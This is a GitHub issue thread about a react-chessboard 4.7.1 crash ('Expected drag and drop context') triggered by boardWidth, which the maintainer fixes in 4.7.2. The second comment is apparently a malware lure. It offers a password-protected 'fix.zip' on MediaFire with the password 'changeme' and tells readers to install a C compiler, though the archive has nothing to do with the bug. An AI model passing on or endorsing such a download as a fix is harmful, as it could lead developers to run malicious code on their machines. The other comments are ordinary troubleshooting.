### ISSUE TITLE
Error in 4.7.1: Invariant Violation: Expected drag and drop context

### ISSUE THREAD

**Issue by danbockapps** [Clariity/react-chessboard#166]
My app crashes with this error when I have the code below. This is new in 4.7.1; the error does not happen in 4.7.0.

```
      <Chessboard
        arePiecesDraggable={false}
        boardWidth={212}
      />
```

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by danmandel** [comment]
I'm getting the same error. Looks like it happens any time I specify a `boardWidth`. Using it in a next.js app. Anyone have a fix for this?

**Comment by danbockapps** [comment]
I downgraded to 4.7.0 and that fixed this problem. But also I ended up not needing boardWidth since the board is responsive and its size can be controlled by its container. So I could probably upgrade to 4.7.1 again.

**Comment by Clariity** [comment]
I've been able to replicate this in a codesandbox, will look into it now

**Comment by Clariity** [comment]
fixed in https://github.com/Clariity/react-chessboard/releases/tag/v4.7.2
